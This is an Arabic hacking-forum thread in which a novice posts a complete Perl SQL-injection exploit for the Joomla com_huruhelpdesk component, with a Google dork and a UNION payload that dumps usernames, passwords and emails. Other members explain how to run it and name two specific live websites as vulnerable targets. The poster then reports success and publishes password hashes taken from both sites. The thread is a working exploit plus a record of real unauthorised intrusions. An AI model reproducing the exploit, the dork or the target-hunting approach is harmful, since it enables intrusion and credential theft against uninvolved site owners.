التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 11-26-2012, 07:00 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Qroy hacker
 

 

 
إحصائية العضو





Qroy hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Qroy hacker is on a distinguished road

Post غير مجاب: وصلت لمرحلة اليأس


سلام عليكم ورحمة الله وبركاتة ..
كيف الحال ان شاء الله بخير

وصلت لمرحلة اليأس

بصراحة بديت بتعلم حقن قواعد بيانات sql
وتعلمت عليها جيداً
لكن دائماً تجيني مشاكل بها ، وهي عدم وجود لوحه تحكم بعض المواقع أحياناً يجي اخطاء غريبة
لاعرف لها حل
مثل ، لايطلع الجدول المطلوب
والخ من المشاكل

قلت بشوف ثغرات سكربت جملا ، والورد بريس
بس للاسف ماعرفت لها ..
حاولت اترجم مافهمت كيف استغل

مثلا هاذي الثغرة

كود PHP:
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection  #Google Dork: "inurl:option=com_huruhelpdesk"#Date: 04/10/2012#Exploit Author: D35m0nd142#Vendor Homepage: http://www.huruhelpdesk.net/#Tested on Joomla 1.5 #CVE: 2010-2907  #!/usr/bin/perlsystem("clear");print "***************************************\n";print " Joomla Component com_huruhelpdesk    *\n";print "      SQL Injection exploit           *\n";print "      Created by D35m0nd142           *\n";print "***************************************\n\n";use LWP::UserAgent;print "Target page [ex: http://www.site.com/dir] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website=  $target .  "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){print "[+] Password found --> $1\n\n";sleep 1;}else{print "No password found :(\n";}   # 1337day.com [2012-11-26] 
الي فهمته منها ادخل على الدوس
واكتب
cd..
cd..
نتحول لقرص الـc
من ثم
cd perl
وننتقل لـperl
ومن ثم cd bin
ومن ثم اروح للي حفظته بمجلد bin
وكمثال سميته kk.pl
اكتب kk.pl
يجي هكذا

كود PHP:
C:\Perl\bin>ksa.pl
'clear' is not recognized as an internal or external command,
operable program or batch file.
***************************************
 
Joomla Component com_huruhelpdesk    *
      
SQL Injection exploit           *
      
Created by D35m0nd142           *
***************************************

Target page [exhttp://www.site.com/dir] --> 
الآن ماذا افعل ،

طفشت بصراحة ولا مرة سويت شي صح

حتى الثغرات مافهم لها


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC ,wgj glvpgm hgdHs

التوقيع

 

   

رد مع اقتباس
قديم 11-26-2012, 08:04 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
المفترس
:: مهووس الكمبيوتر ::
 
الصورة الرمزية المفترس
 

 

 
إحصائية العضو





المفترس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المفترس is on a distinguished road

افتراضي رد: وصلت لمرحلة اليأس


يلزمك target اي هدف تضعه مع اسم الملف هكدا ksa.pl target site وان لم يعمل فاعلم ان يوجد خطا في برمجة الملف او لم تنقله صح او ملف يعمل على نظام غير نظامك

التوقيع

Almoftarse over from here

تم ترك الهاكر والبرمجة وكل ما يخص الكمبيوتر لمدة عام

لا يوجد في هدا العالم صداقة الا صداقة الوالدين وبعدين صداقة العقل وبعدهما صداقة المال والنفود

 

   

رد مع اقتباس
قديم 11-26-2012, 08:49 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية ChucK NoRRis
 

 

 
إحصائية العضو







ChucK NoRRis غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ChucK NoRRis is on a distinguished road

افتراضي رد: وصلت لمرحلة اليأس


يلزمك تضع رابط موقع مصاب
و الموقع المصاب تحصلو بالدورك المرفق مع الثغرة

كود:
inurl:"option=com_huruhelpdesk"
ولما تظغط انتر راح يقوم بالواجب و يجيبلك الباس بس مشفرة
وهاذم موقعين مصابين يمكن تجرب عليهم
كود:
http://www.rocktopia.co.uk/
http://www.itonwork.dk/
التوقيع

دخول متقطع مشاكل بالنت

 

   

رد مع اقتباس
قديم 11-27-2012, 12:12 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Qroy hacker
 

 

 
إحصائية العضو





Qroy hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Qroy hacker is on a distinguished road

افتراضي رد: وصلت لمرحلة اليأس


الله يعطيكم العافية يا أبطال وتم بحمدلله ..
معرفه كيف إستغلال الثغره ..
بالنسبة للمواقع الي طرحها اخوي ChucK NoRRis
هذا الهاش للموقع الاول
457c65286f6c682607136716b9fa8332
الموقع الثاني
4dba85486a30492103d1eb533f8a2e1f

ان شاء الله .. لاحتراف أكبر

التوقيع

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:41 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0